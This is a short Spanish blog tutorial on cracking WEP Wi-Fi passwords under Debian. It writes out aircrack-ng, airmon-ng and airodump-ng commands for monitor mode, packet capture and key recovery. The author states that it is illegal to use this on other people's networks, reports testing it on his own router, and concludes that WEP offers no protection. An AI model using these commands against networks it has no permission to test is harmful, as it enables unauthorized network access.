Lo primero, debe quedar claro que no es legal forzar una contraseña WIFI que no sea nuestra. Ademas, también es cuestionable a nivel ético. El objeto de este tutorial, es únicamente formativo. De hecho, las pruebas las realicé con mi propio WIFI, para probar una antena usb comprada a un precio “asombroso” y entender mejor porque se considera que las contraseñas WEP no protegen en absoluto.
Yo saqué dos conclusiones, que por 5 euros mi WIFI usb se calienta como un horno, pero funciona y que mejor no poner codificación WEP en mi router aunque me quede sin poder jugar on-line con mi vieja NDS, incompatible con WPA.
Existen distribuciones especificas para auditoria, como por ejemplo, Backtrack, pero si ya tienes tu WIFI configurada en Debian… ¿porque desprenderme de el?
Lo básico, es instalar aircrack-ng. Desafortunadamente, esta en los repositorios de Lenny y en los repositorios sid, pero no en los de la versión “estable” ni de la versión “testing”. Podría haber apuntado mi source.list a sid y haber instalado, pero tirar de repositorios sid es bastante peligroso, y finalmente, lo que hice fue bajar la ultima versión de los repositorios, vía web, desde aquí e instalarla desde la consola con:

sudo dpkg -i paquetedescargado.deb

¡Vaaale! También lo puedes hacer pulsando con el botón derecho del ratón sobre el fichero descargado y seleccionar “instalar con gdebi”.
Empezamos a trabajar:
Abrimos una terminal y nos logamos como super usuario. En la terminal escribimos:

sudo airmon-ng start wlan0 // depende del nombre que tenga en tu pc,


para poner la tarjeta de red en modo monitor


sudo airodump-ng mon0 //ver las redes


otro terminal :


sudo airodump-ng mon0 –channel 6 –bssid 00:00:00:00:00:00 -w Escritorio/doom //donde quedan recogidos los paquetes y cambiar MAC


otro terminal:


aircrack-ng /home/usuario/Desktop/*.cap –bssid 00:00:00:00:00:00  /home/usuario/Desktop/key2.txt //cambiar MAC

 

  • BSSID (Es la MAC del router, por ejemplo 00:11:22:33:44:55)
  • CHN (Canal por el que se transmite, por ejemplo el 11)
  • ESSID (El nombre de la red, por ejemplo Mi_wifi)

 

fuente uno : http://ur1.ca/5ot3m
Saludos